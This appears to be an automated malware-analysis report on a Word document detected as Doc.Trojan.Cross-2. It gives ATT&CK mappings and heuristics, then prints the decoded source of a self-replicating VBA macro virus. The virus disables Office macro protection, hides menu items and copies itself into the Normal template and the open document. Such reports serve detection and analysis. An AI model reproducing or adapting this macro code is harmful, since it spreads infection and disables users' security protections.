MALICIOUS
236
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1553.005 Security Software Installation
The sample contains VBA macros that attempt to disable macro virus protection and replicate themselves into the Normal template and the active document. The AutoOpen, AutoClose, AutoExit, and AutoExec subroutines all call AutoOpen, indicating a strong focus on persistence and spread. The script also attempts to export its own code to 'c:\X.VIC', suggesting an attempt to establish persistence or facilitate further infection.
Heuristics 6
-
ClamAV: Doc.Trojan.Cross-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Cross-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1455 bytes |
SHA-256: 4ccf203b69ddcf3981860a646db3c02c77eabfe1c04964cac4e95a55facc2ef9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Cross-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "X"
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
Application.VBE.ActiveVBProject.VBComponents("X").Export "c:\X.VIC"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "X" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "X" Then ActivInstall = True
Next I
If ActivInstall = True And NormInstall = False Then Set SexR = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set SexR = ActiveDocument.VBProject
With SexR
With .VBComponents.Import("c:\X.VIC")
End With
End With
If ActivInstall = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
' seXr-1.Poppy (Fast, Small, Full Stealth and SR-1 Compatable)
' by VicodinES
End Sub
Sub AutoClose()
Call AutoOpen
End Sub
Sub AutoExit()
Call AutoOpen
End Sub
Sub AutoExec()
Call AutoOpen
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.